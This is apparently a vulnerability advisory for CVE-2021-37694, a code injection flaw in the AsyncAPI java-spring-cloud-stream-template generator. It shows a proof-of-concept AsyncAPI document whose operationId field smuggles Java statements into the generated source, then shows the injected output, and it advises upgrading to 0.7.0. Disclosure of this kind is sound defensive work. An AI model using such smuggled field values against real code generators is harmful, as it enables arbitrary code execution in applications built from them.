CVE-2021-37694
Code injection issue for java-spring-cloud-stream-template
Description
The following was initially reported by @jonaslagoni: Given the following command: `ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output` With the following AsyncAPI document: ```json { "asyncapi": "2.0.0", "info": { "title": "Streetlight", "version": "1.0.0" }, "defaultContentType": "json", "channels": { "security/audit/channel": { "description": "Channel for the turn on command which should turn on the streetlight", "parameters": { "streetlight_id": { "description": "The ID of the streetlight", "schema": { "type": "string" } } }, "publish": { "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername", "message": { "name": "TurnonCommand", "payload": { "$ref": "#/components/schemas/CustomClass" } } } } }, "components": { "schemas" : { "CustomClass": { "type": "object", "properties": { "prop": { "type": "string" } } } } } } ``` Which changes the following output: ```java ... @Bean public Consumer<CustomClass> test() { // Add business logic here. return null; } ... ``` To ```java ... @Bean public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); } public Consumer<CustomClass> someothername() { // Add business logic here. return null; } ... ```
How to fix CVE-2021-37694
To remediate CVE-2021-37694, upgrade the affected package to a fixed version below.
- —upgrade to 0.7.0 or later
Is CVE-2021-37694 being exploited?
Low — EPSS is 0.2%, meaning exploitation activity has not been observed at scale.